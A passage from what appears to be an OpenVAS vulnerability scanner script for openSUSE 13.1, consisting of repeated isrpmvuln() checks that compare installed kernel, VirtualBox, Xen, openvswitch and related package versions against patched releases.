rpm:\"ipset-kmp-default~6.21.1_k3.12.62_52~2.36.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-default-debuginfo\", rpm:\"ipset-kmp-default-debuginfo~6.21.1_k3.12.62_52~2.36.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-desktop\", rpm:\"ipset-kmp-desktop~6.21.1_k3.12.62_52~2.36.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-desktop-debuginfo\", rpm:\"ipset-kmp-desktop-debuginfo~6.21.1_k3.12.62_52~2.36.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-xen\", rpm:\"ipset-kmp-xen~6.21.1_k3.12.62_52~2.36.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-xen-debuginfo\", rpm:\"ipset-kmp-xen-debuginfo~6.21.1_k3.12.62_52~2.36.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"iscsitarget\", rpm:\"iscsitarget~1.4.20.3~13.32.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"iscsitarget-debuginfo\", rpm:\"iscsitarget-debuginfo~1.4.20.3~13.32.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"iscsitarget-debugsource\", rpm:\"iscsitarget-debugsource~1.4.20.3~13.32.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"iscsitarget-kmp-default\", rpm:\"iscsitarget-kmp-default~1.4.20.3_k3.12.62_52~13.32.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"iscsitarget-kmp-default-debuginfo\", rpm:\"iscsitarget-kmp-default-debuginfo~1.4.20.3_k3.12.62_52~13.32.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"iscsitarget-kmp-desktop\", rpm:\"iscsitarget-kmp-desktop~1.4.20.3_k3.12.62_52~13.32.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"iscsitarget-kmp-desktop-debuginfo\", rpm:\"iscsitarget-kmp-desktop-debuginfo~1.4.20.3_k3.12.62_52~13.32.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"iscsitarget-kmp-xen\", rpm:\"iscsitarget-kmp-xen~1.4.20.3_k3.12.62_52~13.32.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"iscsitarget-kmp-xen-debuginfo\", rpm:\"iscsitarget-kmp-xen-debuginfo~1.4.20.3_k3.12.62_52~13.32.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base-debuginfo\", rpm:\"kernel-default-base-debuginfo~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libipset3\", rpm:\"libipset3~6.21.1~2.36.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libipset3-debuginfo\", rpm:\"libipset3-debuginfo~6.21.1~2.36.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ndiswrapper\", rpm:\"ndiswrapper~1.58~33.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ndiswrapper-debuginfo\", rpm:\"ndiswrapper-debuginfo~1.58~33.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ndiswrapper-debugsource\", rpm:\"ndiswrapper-debugsource~1.58~33.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ndiswrapper-kmp-default\", rpm:\"ndiswrapper-kmp-default~1.58_k3.12.62_52~33.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ndiswrapper-kmp-default-debuginfo\", rpm:\"ndiswrapper-kmp-default-debuginfo~1.58_k3.12.62_52~33.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ndiswrapper-kmp-desktop\", rpm:\"ndiswrapper-kmp-desktop~1.58_k3.12.62_52~33.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ndiswrapper-kmp-desktop-debuginfo\", rpm:\"ndiswrapper-kmp-desktop-debuginfo~1.58_k3.12.62_52~33.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openvswitch\", rpm:\"openvswitch~1.11.0~0.39.3\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openvswitch-controller\", rpm:\"openvswitch-controller~1.11.0~0.39.3\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openvswitch-controller-debuginfo\", rpm:\"openvswitch-controller-debuginfo~1.11.0~0.39.3\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openvswitch-debuginfo\", rpm:\"openvswitch-debuginfo~1.11.0~0.39.3\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openvswitch-debugsource\", rpm:\"openvswitch-debugsource~1.11.0~0.39.3\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openvswitch-kmp-default\", rpm:\"openvswitch-kmp-default~1.11.0_k3.12.62_52~0.39.3\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openvswitch-kmp-default-debuginfo\", rpm:\"openvswitch-kmp-default-debuginfo~1.11.0_k3.12.62_52~0.39.3\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openvswitch-kmp-desktop\", rpm:\"openvswitch-kmp-desktop~1.11.0_k3.12.62_52~0.39.3\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openvswitch-kmp-desktop-debuginfo\", rpm:\"openvswitch-kmp-desktop-debuginfo~1.11.0_k3.12.62_52~0.39.3\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openvswitch-kmp-xen\", rpm:\"openvswitch-kmp-xen~1.11.0_k3.12.62_52~0.39.3\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openvswitch-kmp-xen-debuginfo\", rpm:\"openvswitch-kmp-xen-debuginfo~1.11.0_k3.12.62_52~0.39.3\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openvswitch-pki\", rpm:\"openvswitch-pki~1.11.0~0.39.3\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openvswitch-switch\", rpm:\"openvswitch-switch~1.11.0~0.39.3\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openvswitch-switch-debuginfo\", rpm:\"openvswitch-switch-debuginfo~1.11.0~0.39.3\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openvswitch-test\", rpm:\"openvswitch-test~1.11.0~0.39.3\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock\", rpm:\"pcfclock~0.44~258.33.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-debuginfo\", rpm:\"pcfclock-debuginfo~0.44~258.33.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-debugsource\", rpm:\"pcfclock-debugsource~0.44~258.33.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-kmp-default\", rpm:\"pcfclock-kmp-default~0.44_k3.12.62_52~258.33.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-kmp-default-debuginfo\", rpm:\"pcfclock-kmp-default-debuginfo~0.44_k3.12.62_52~258.33.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-kmp-desktop\", rpm:\"pcfclock-kmp-desktop~0.44_k3.12.62_52~258.33.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-kmp-desktop-debuginfo\", rpm:\"pcfclock-kmp-desktop-debuginfo~0.44_k3.12.62_52~258.33.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-openvswitch\", rpm:\"python-openvswitch~1.11.0~0.39.3\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-openvswitch-test\", rpm:\"python-openvswitch-test~1.11.0~0.39.3\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-virtualbox\", rpm:\"python-virtualbox~4.2.36~2.64.4\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-virtualbox-debuginfo\", rpm:\"python-virtualbox-debuginfo~4.2.36~2.64.4\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-debugsource\", rpm:\"vhba-kmp-debugsource~20130607~2.32.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-default-\", rpm:\"vhba-kmp-default~20130607_k3.12.62_52~2.32.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-default-debuginfo-\", rpm:\"vhba-kmp-default-debuginfo~20130607_k3.12.62_52~2.32.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-desktop-\", rpm:\"vhba-kmp-desktop~20130607_k3.12.62_52~2.32.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-desktop-debuginfo-\", rpm:\"vhba-kmp-desktop-debuginfo~20130607_k3.12.62_52~2.32.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-xen-\", rpm:\"vhba-kmp-xen~20130607_k3.12.62_52~2.32.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-xen-debuginfo-\", rpm:\"vhba-kmp-xen-debuginfo~20130607_k3.12.62_52~2.32.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox\", rpm:\"virtualbox~4.2.36~2.64.4\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-debuginfo\", rpm:\"virtualbox-debuginfo~4.2.36~2.64.4\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-debugsource\", rpm:\"virtualbox-debugsource~4.2.36~2.64.4\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-devel\", rpm:\"virtualbox-devel~4.2.36~2.64.4\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-kmp-default\", rpm:\"virtualbox-guest-kmp-default~4.2.36_k3.12.62_52~2.64.4\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-kmp-default-debuginfo\", rpm:\"virtualbox-guest-kmp-default-debuginfo~4.2.36_k3.12.62_52~2.64.4\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-kmp-desktop\", rpm:\"virtualbox-guest-kmp-desktop~4.2.36_k3.12.62_52~2.64.4\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-kmp-desktop-debuginfo\", rpm:\"virtualbox-guest-kmp-desktop-debuginfo~4.2.36_k3.12.62_52~2.64.4\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-tools\", rpm:\"virtualbox-guest-tools~4.2.36~2.64.4\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-tools-debuginfo\", rpm:\"virtualbox-guest-tools-debuginfo~4.2.36~2.64.4\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-x11\", rpm:\"virtualbox-guest-x11~4.2.36~2.64.4\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-x11-debuginfo\", rpm:\"virtualbox-guest-x11-debuginfo~4.2.36~2.64.4\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-host-kmp-default\", rpm:\"virtualbox-host-kmp-default~4.2.36_k3.12.62_52~2.64.4\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-host-kmp-default-debuginfo\", rpm:\"virtualbox-host-kmp-default-debuginfo~4.2.36_k3.12.62_52~2.64.4\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-host-kmp-desktop\", rpm:\"virtualbox-host-kmp-desktop~4.2.36_k3.12.62_52~2.64.4\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-host-kmp-desktop-debuginfo\", rpm:\"virtualbox-host-kmp-desktop-debuginfo~4.2.36_k3.12.62_52~2.64.4\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-qt\", rpm:\"virtualbox-qt~4.2.36~2.64.4\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-qt-debuginfo\", rpm:\"virtualbox-qt-debuginfo~4.2.36~2.64.4\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-websrv\", rpm:\"virtualbox-websrv~4.2.36~2.64.4\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-websrv-debuginfo\", rpm:\"virtualbox-websrv-debuginfo~4.2.36~2.64.4\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-debugsource\", rpm:\"xen-debugsource~4.3.4_10~65.3\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-devel\", rpm:\"xen-devel~4.3.4_10~65.3\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-default\", rpm:\"xen-kmp-default~4.3.4_10_k3.12.62_52~65.3\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-default-debuginfo\", rpm:\"xen-kmp-default-debuginfo~4.3.4_10_k3.12.62_52~65.3\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-desktop\", rpm:\"xen-kmp-desktop~4.3.4_10_k3.12.62_52~65.3\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-desktop-debuginfo\", rpm:\"xen-kmp-desktop-debuginfo~4.3.4_10_k3.12.62_52~65.3\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-libs\", rpm:\"xen-libs~4.3.4_10~65.3\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-libs-debuginfo\", rpm:\"xen-libs-debuginfo~4.3.4_10~65.3\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools-domU\", rpm:\"xen-tools-domU~4.3.4_10~65.3\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools-domU-debuginfo\", rpm:\"xen-tools-domU-debuginfo~4.3.4_10~65.3\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons\", rpm:\"xtables-addons~2.3~2.31.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-debuginfo\", rpm:\"xtables-addons-debuginfo~2.3~2.31.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-debugsource\", rpm:\"xtables-addons-debugsource~2.3~2.31.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-kmp-default\", rpm:\"xtables-addons-kmp-default~2.3_k3.12.62_52~2.31.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-kmp-default-debuginfo\", rpm:\"xtables-addons-kmp-default-debuginfo~2.3_k3.12.62_52~2.31.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-kmp-desktop\", rpm:\"xtables-addons-kmp-desktop~2.3_k3.12.62_52~2.31.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-kmp-desktop-debuginfo\", rpm:\"xtables-addons-kmp-desktop-debuginfo~2.3_k3.12.62_52~2.31.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-kmp-xen\", rpm:\"xtables-addons-kmp-xen~2.3_k3.12.62_52~2.31.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-kmp-xen-debuginfo\", rpm:\"xtables-addons-kmp-xen-debuginfo~2.3_k3.12.62_52~2.31.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-base\", rpm:\"kernel-debug-base~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-base-debuginfo\", rpm:\"kernel-debug-base-debuginfo~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-debugsource\", rpm:\"kernel-debug-debugsource~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel-debuginfo\", rpm:\"kernel-debug-devel-debuginfo~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop\", rpm:\"kernel-desktop~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-base\", rpm:\"kernel-desktop-base~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-base-debuginfo\", rpm:\"kernel-desktop-base-debuginfo~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-debuginfo\", rpm:\"kernel-desktop-debuginfo~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-debugsource\", rpm:\"kernel-desktop-debugsource~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-devel\", rpm:\"kernel-desktop-devel~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2\", rpm:\"kernel-ec2~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-base\", rpm:\"kernel-ec2-base~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-base-debuginfo\", rpm:\"kernel-ec2-base-debuginfo~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-debuginfo\", rpm:\"kernel-ec2-debuginfo~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-debugsource\", rpm:\"kernel-ec2-debugsource~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-devel\", rpm:\"kernel-ec2-devel~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace\", rpm:\"kernel-trace~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-base\", rpm:\"kernel-trace-base~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-base-debuginfo\", rpm:\"kernel-trace-base-debuginfo~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-debuginfo\", rpm:\"kernel-trace-debuginfo~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-debugsource\", rpm:\"kernel-trace-debugsource~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-devel\", rpm:\"kernel-trace-devel~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla\", rpm:\"kernel-vanilla~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-debuginfo\", rpm:\"kernel-vanilla-debuginfo~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-debugsource\", rpm:\"kernel-vanilla-debugsource~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-devel\", rpm:\"kernel-vanilla-devel~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base-debuginfo\", rpm:\"kernel-xen-base-debuginfo~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debugsource\", rpm:\"kernel-xen-debugsource~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-docs\", rpm:\"kernel-docs~3.12.62~52.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-macros\", rpm:\"kernel-macros~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source-vanilla\", rpm:\"kernel-source-vanilla~3.12.62~52.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-host-source\", rpm:\"virtualbox-host-source~4.2.36~2.64.4\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.3.4_10~65.3\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-doc-html\", rpm:\"xen-doc-html~4.3.4_10~65.3\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-libs-32bit\", rpm:\"xen-libs-32bit~4.3.4_10~65.3\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-libs-debuginfo-32bit\", rpm:\"xen-libs-debuginfo-32bit~4.3.4_10~65.3\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools\", rpm:\"xen-tools~4.3.4_10~65.3\", 